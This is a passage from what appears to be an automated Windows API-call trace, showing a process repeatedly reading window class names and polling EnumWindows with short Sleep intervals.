lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.759] GetClassNameA (in: hWnd=0x102e0, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.759] GetClassNameA (in: hWnd=0x102d6, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.759] GetClassNameA (in: hWnd=0x102d2, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.759] GetClassNameA (in: hWnd=0x102ca, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.759] GetClassNameA (in: hWnd=0x102c8, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.759] GetClassNameA (in: hWnd=0x102bc, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.759] GetClassNameA (in: hWnd=0x102ba, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.759] GetClassNameA (in: hWnd=0x102b2, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.759] GetClassNameA (in: hWnd=0x102a8, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.759] GetClassNameA (in: hWnd=0x10290, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.759] GetClassNameA (in: hWnd=0x1028e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.759] GetClassNameA (in: hWnd=0x10286, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.759] GetClassNameA (in: hWnd=0x10284, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.759] GetClassNameA (in: hWnd=0x10270, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.759] GetClassNameA (in: hWnd=0x10266, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.760] GetClassNameA (in: hWnd=0x10262, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.760] GetClassNameA (in: hWnd=0x10258, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.760] GetClassNameA (in: hWnd=0x10256, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.760] GetClassNameA (in: hWnd=0x10252, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.760] GetClassNameA (in: hWnd=0x10250, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.760] GetClassNameA (in: hWnd=0x1024e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.760] GetClassNameA (in: hWnd=0x1024a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.760] GetClassNameA (in: hWnd=0x10248, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.760] GetClassNameA (in: hWnd=0x1023e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.760] GetClassNameA (in: hWnd=0x10234, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.760] GetClassNameA (in: hWnd=0x10224, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.760] GetClassNameA (in: hWnd=0x10218, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.760] GetClassNameA (in: hWnd=0x10216, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.760] GetClassNameA (in: hWnd=0x20138, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.760] GetClassNameA (in: hWnd=0x101cc, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.760] GetClassNameA (in: hWnd=0x101ae, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.761] GetClassNameA (in: hWnd=0x1010c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.761] GetClassNameA (in: hWnd=0x100fe, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.761] GetClassNameA (in: hWnd=0x100f8, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0149.761] GetClassNameA (in: hWnd=0x100ea, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.761] GetClassNameA (in: hWnd=0x20032, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.761] GetClassNameA (in: hWnd=0x2019e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.761] GetClassNameA (in: hWnd=0x1007e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.761] GetClassNameA (in: hWnd=0x20074, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0149.761] Sleep (dwMilliseconds=0x64) [0149.766] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.766] GetClassNameA (in: hWnd=0x100ec, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Worker Window") returned 13 [0149.766] GetClassNameA (in: hWnd=0x1014a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0149.766] GetClassNameA (in: hWnd=0x1010e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0149.766] GetClassNameA (in: hWnd=0x1011c, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0149.766] GetClassNameA (in: hWnd=0x10120, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0149.766] GetClassNameA (in: hWnd=0x10122, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0149.767] GetClassNameA (in: hWnd=0x1011e, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0149.767] GetClassNameA (in: hWnd=0x1011a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0149.767] GetClassNameA (in: hWnd=0x10118, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0149.767] GetClassNameA (in: hWnd=0x10116, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0149.767] GetClassNameA (in: hWnd=0x10114, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0149.767] GetClassNameA (in: hWnd=0x10178, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0149.767] GetClassNameA (in: hWnd=0x1016a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0149.767] GetClassNameA (in: hWnd=0x1015a, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0149.767] GetClassNameA (in: hWnd=0x10112, lpClassName=0xffefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0149.768] Sleep (dwMilliseconds=0x64) [0149.780] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.781] Sleep (dwMilliseconds=0x64) [0149.794] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.796] Sleep (dwMilliseconds=0x64) [0149.812] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.812] Sleep (dwMilliseconds=0x64) [0149.827] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.827] Sleep (dwMilliseconds=0x64) [0149.890] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.890] Sleep (dwMilliseconds=0x64) [0149.937] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.937] Sleep (dwMilliseconds=0x64) [0149.953] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.953] Sleep (dwMilliseconds=0x64) [0149.968] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.968] Sleep (dwMilliseconds=0x64) [0149.994] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.994] Sleep (dwMilliseconds=0x64) [0149.996] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0149.996] Sleep (dwMilliseconds=0x64) [0150.012] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.013] Sleep (dwMilliseconds=0x64) [0150.031] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.031] Sleep (dwMilliseconds=0x64) [0150.137] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.138] Sleep (dwMilliseconds=0x64) [0150.234] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.234] Sleep (dwMilliseconds=0x64) [0150.251] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.251] Sleep (dwMilliseconds=0x64) [0150.262] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.263] Sleep (dwMilliseconds=0x64) [0150.281] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.282] Sleep (dwMilliseconds=0x64) [0150.300] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.301] Sleep (dwMilliseconds=0x64) [0150.310] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.311] Sleep (dwMilliseconds=0x64) [0150.324] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.325] Sleep (dwMilliseconds=0x64) [0150.340] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.341] Sleep (dwMilliseconds=0x64) [0150.407] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.408] Sleep (dwMilliseconds=0x64) [0150.452] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.453] Sleep (dwMilliseconds=0x64) [0150.465] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.466] Sleep (dwMilliseconds=0x64) [0150.481] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.481] Sleep (dwMilliseconds=0x64) [0150.496] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.497] Sleep (dwMilliseconds=0x64) [0150.515] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.516] Sleep (dwMilliseconds=0x64) [0150.544] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.544] Sleep (dwMilliseconds=0x64) [0150.559] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.559] Sleep (dwMilliseconds=0x64) [0150.608] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.609] Sleep (dwMilliseconds=0x64) [0150.654] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.654] Sleep (dwMilliseconds=0x64) [0150.671] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.672] Sleep (dwMilliseconds=0x64) [0150.686] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.687] Sleep (dwMilliseconds=0x64) [0150.700] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.700] Sleep (dwMilliseconds=0x64) [0150.715] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.716] Sleep (dwMilliseconds=0x64) [0150.731] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.731] Sleep (dwMilliseconds=0x64) [0150.749] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.750] Sleep (dwMilliseconds=0x64) [0150.765] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.766] Sleep (dwMilliseconds=0x64) [0150.812] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.813] Sleep (dwMilliseconds=0x64) [0150.856] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.856] Sleep (dwMilliseconds=0x64) [0150.878] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.879] Sleep (dwMilliseconds=0x64) [0150.887] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.887] Sleep (dwMilliseconds=0x64) [0150.903] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.903] Sleep (dwMilliseconds=0x64) [0150.918] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.920] Sleep (dwMilliseconds=0x64) [0150.946] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.947] Sleep (dwMilliseconds=0x64) [0150.953] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.954] Sleep (dwMilliseconds=0x64) [0150.966] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0150.967] Sleep (dwMilliseconds=0x64) [0151.032] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.032] Sleep (dwMilliseconds=0x64) [0151.091] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.092] Sleep (dwMilliseconds=0x64) [0151.215] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.219] Sleep (dwMilliseconds=0x64) [0151.265] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.265] Sleep (dwMilliseconds=0x64) [0151.324] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.325] Sleep (dwMilliseconds=0x64) [0151.437] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.438] Sleep (dwMilliseconds=0x64) [0151.454] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.454] Sleep (dwMilliseconds=0x64) [0151.501] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.501] Sleep (dwMilliseconds=0x64) [0151.536] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.537] Sleep (dwMilliseconds=0x64) [0151.543] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.544] Sleep (dwMilliseconds=0x64) [0151.562] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.563] Sleep (dwMilliseconds=0x64) [0151.606] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.607] Sleep (dwMilliseconds=0x64) [0151.645] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.645] Sleep (dwMilliseconds=0x64) [0151.654] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.655] Sleep (dwMilliseconds=0x64) [0151.672] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.672] Sleep (dwMilliseconds=0x64) [0151.715] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.716] Sleep (dwMilliseconds=0x64) [0151.753] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.754] Sleep (dwMilliseconds=0x64) [0151.762] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.762] Sleep (dwMilliseconds=0x64) [0151.791] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.792] Sleep (dwMilliseconds=0x64) [0151.844] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.845] Sleep (dwMilliseconds=0x64) [0151.885] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.885] Sleep (dwMilliseconds=0x64) [0151.887] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.888] Sleep (dwMilliseconds=0x64) [0151.906] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.907] Sleep (dwMilliseconds=0x64) [0151.951] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.952] Sleep (dwMilliseconds=0x64) [0151.994] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0151.994] Sleep (dwMilliseconds=0x64) [0152.000] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.000] Sleep (dwMilliseconds=0x64) [0152.046] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.047] Sleep (dwMilliseconds=0x64) [0152.106] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.110] Sleep (dwMilliseconds=0x64) [0152.203] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.203] Sleep (dwMilliseconds=0x64) [0152.266] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.267] Sleep (dwMilliseconds=0x64) [0152.285] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.285] Sleep (dwMilliseconds=0x64) [0152.296] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.297] Sleep (dwMilliseconds=0x64) [0152.325] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.329] Sleep (dwMilliseconds=0x64) [0152.375] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.375] Sleep (dwMilliseconds=0x64) [0152.396] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.396] Sleep (dwMilliseconds=0x64) [0152.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.403] Sleep (dwMilliseconds=0x64) [0152.437] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.438] Sleep (dwMilliseconds=0x64) [0152.482] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.482] Sleep (dwMilliseconds=0x64) [0152.506] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.507] Sleep (dwMilliseconds=0x64) [0152.512] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.512] Sleep (dwMilliseconds=0x64) [0152.530] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.531] Sleep (dwMilliseconds=0x64) [0152.578] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.579] Sleep (dwMilliseconds=0x64) [0152.623] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.623] Sleep (dwMilliseconds=0x64) [0152.643] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.643] Sleep (dwMilliseconds=0x64) [0152.687] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.688] Sleep (dwMilliseconds=0x64) [0152.728] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.728] Sleep (dwMilliseconds=0x64) [0152.733] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.734] Sleep (dwMilliseconds=0x64) [0152.798] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.799] Sleep (dwMilliseconds=0x64) [0152.844] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.845] Sleep (dwMilliseconds=0x64) [0152.862] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.863] Sleep (dwMilliseconds=0x64) [0152.874] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.875] Sleep (dwMilliseconds=0x64) [0152.907] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.908] Sleep (dwMilliseconds=0x64) [0152.952] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.953] Sleep (dwMilliseconds=0x64) [0152.988] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.989] Sleep (dwMilliseconds=0x64) [0152.999] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0152.999] Sleep (dwMilliseconds=0x64) [0153.016] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.016] Sleep (dwMilliseconds=0x64) [0153.062] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.063] Sleep (dwMilliseconds=0x64) [0153.129] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.129] Sleep (dwMilliseconds=0x64) [0153.232] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.232] Sleep (dwMilliseconds=0x64) [0153.279] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.279] Sleep (dwMilliseconds=0x64) [0153.356] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.356] Sleep (dwMilliseconds=0x64) [0153.405] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.406] Sleep (dwMilliseconds=0x64) [0153.468] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.469] Sleep (dwMilliseconds=0x64) [0153.522] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.523] Sleep (dwMilliseconds=0x64) [0153.528] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.528] Sleep (dwMilliseconds=0x64) [0153.578] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.579] Sleep (dwMilliseconds=0x64) [0153.611] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.611] Sleep (dwMilliseconds=0x64) [0153.621] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.622] Sleep (dwMilliseconds=0x64) [0153.637] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.638] Sleep (dwMilliseconds=0x64) [0153.689] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.690] Sleep (dwMilliseconds=0x64) [0153.731] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.732] Sleep (dwMilliseconds=0x64) [0153.749] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.749] Sleep (dwMilliseconds=0x64) [0153.796] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.796] Sleep (dwMilliseconds=0x64) [0153.821] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.821] Sleep (dwMilliseconds=0x64) [0153.825] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.825] Sleep (dwMilliseconds=0x64) [0153.841] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.844] Sleep (dwMilliseconds=0x64) [0153.886] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.886] Sleep (dwMilliseconds=0x64) [0153.908] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.909] Sleep (dwMilliseconds=0x64) [0153.918] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.919] Sleep (dwMilliseconds=0x64) [0153.934] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.934] Sleep (dwMilliseconds=0x64) [0153.982] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.983] Sleep (dwMilliseconds=0x64) [0153.997] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0153.997] Sleep (dwMilliseconds=0x64) [0154.012] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.013] Sleep (dwMilliseconds=0x64) [0154.059] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.060] Sleep (dwMilliseconds=0x64) [0154.093] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.093] Sleep (dwMilliseconds=0x64) [0154.106] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.106] Sleep (dwMilliseconds=0x64) [0154.122] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.122] Sleep (dwMilliseconds=0x64) [0154.169] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.169] Sleep (dwMilliseconds=0x64) [0154.216] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.217] Sleep (dwMilliseconds=0x64) [0154.262] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.263] Sleep (dwMilliseconds=0x64) [0154.299] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.299] Sleep (dwMilliseconds=0x64) [0154.314] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.315] Sleep (dwMilliseconds=0x64) [0154.358] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.359] Sleep (dwMilliseconds=0x64) [0154.398] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.398] Sleep (dwMilliseconds=0x64) [0154.402] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.403] Sleep (dwMilliseconds=0x64) [0154.433] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.435] Sleep (dwMilliseconds=0x64) [0154.481] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.482] Sleep (dwMilliseconds=0x64) [0154.521] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.521] Sleep (dwMilliseconds=0x64) [0154.527] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.528] Sleep (dwMilliseconds=0x64) [0154.544] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.545] Sleep (dwMilliseconds=0x64) [0154.603] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.604] Sleep (dwMilliseconds=0x64) [0154.652] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.653] Sleep (dwMilliseconds=0x64) [0154.703] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.704] Sleep (dwMilliseconds=0x64) [0154.750] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.750] Sleep (dwMilliseconds=0x64) [0154.805] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.806] Sleep (dwMilliseconds=0x64) [0154.856] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.857] Sleep (dwMilliseconds=0x64) [0154.879] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.880] Sleep (dwMilliseconds=0x64) [0154.890] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.890] Sleep (dwMilliseconds=0x64) [0154.984] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0154.984] Sleep (dwMilliseconds=0x64) [0155.033] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.034] Sleep (dwMilliseconds=0x64) [0155.090] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.090] Sleep (dwMilliseconds=0x64) [0155.108] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.109] Sleep (dwMilliseconds=0x64) [0155.177] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.178] Sleep (dwMilliseconds=0x64) [0155.274] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.275] Sleep (dwMilliseconds=0x64) [0155.286] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.286] Sleep (dwMilliseconds=0x64) [0155.294] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.294] Sleep (dwMilliseconds=0x64) [0155.327] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.328] Sleep (dwMilliseconds=0x64) [0155.375] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.376] Sleep (dwMilliseconds=0x64) [0155.401] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.401] Sleep (dwMilliseconds=0x64) [0155.434] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.435] Sleep (dwMilliseconds=0x64) [0155.485] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.485] Sleep (dwMilliseconds=0x64) [0155.531] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.531] Sleep (dwMilliseconds=0x64) [0155.577] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.578] Sleep (dwMilliseconds=0x64) [0155.625] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.625] Sleep (dwMilliseconds=0x64) [0155.671] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.672] Sleep (dwMilliseconds=0x64) [0155.691] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.692] Sleep (dwMilliseconds=0x64) [0155.699] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.700] Sleep (dwMilliseconds=0x64) [0155.734] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.734] Sleep (dwMilliseconds=0x64) [0155.781] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.781] Sleep (dwMilliseconds=0x64) [0155.830] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.831] Sleep (dwMilliseconds=0x64) [0155.872] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.872] Sleep (dwMilliseconds=0x64) [0155.919] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.919] Sleep (dwMilliseconds=0x64) [0155.964] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0155.965] Sleep (dwMilliseconds=0x64) [0155.981] EnumWindows 